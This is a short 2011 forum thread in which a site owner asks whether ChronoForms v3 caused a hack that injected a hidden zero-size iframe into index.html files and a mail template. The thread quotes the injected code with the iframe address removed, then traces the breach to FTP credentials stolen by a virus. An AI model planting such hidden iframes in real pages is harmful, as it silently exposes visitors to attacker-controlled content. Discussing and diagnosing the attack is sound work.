Forums

Site hacked

mekon 01 Jul, 2011
Hi, one of the site I have that use chrono has been hacked.
All of the index.html files have been modified and at the end of the code an iframe has been entered.

However I also noticed that in com_chronocontact/libraries/mails.php there is also this code.

<head>
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\">
<base href=\"".JURI::base()."/\" />
<title>Email</title>
</head>

<body>$email_body<iframe src="THE_ADDRESS_TO_THE_WEB_PAGE_WAS_HERE" width="0" height="0"></iframe></body>
</html>


Im have v3 installed on a windows server.
The joomla version is 1.5.9

Can you tell me if v3 is vulnerable?

Thanks for the advice

M
GreyHead 01 Jul, 2011
Hi Mekon,

I don't know of any particular vulnerabilities in ChronoForms v3 - but there certainly are in Joomla! 1.5.9.

In this case it looks as though the hack was a search and replace on </body> including the one in the mails.php file.

Bob
mekon 01 Jul, 2011
Thanks

Ive just found out that someones computer had a virus on there computer, the person had control panel / ftp details saved in their windows passwords.

Not just a joomla site affected.
This topic is locked and no more replies can be posted.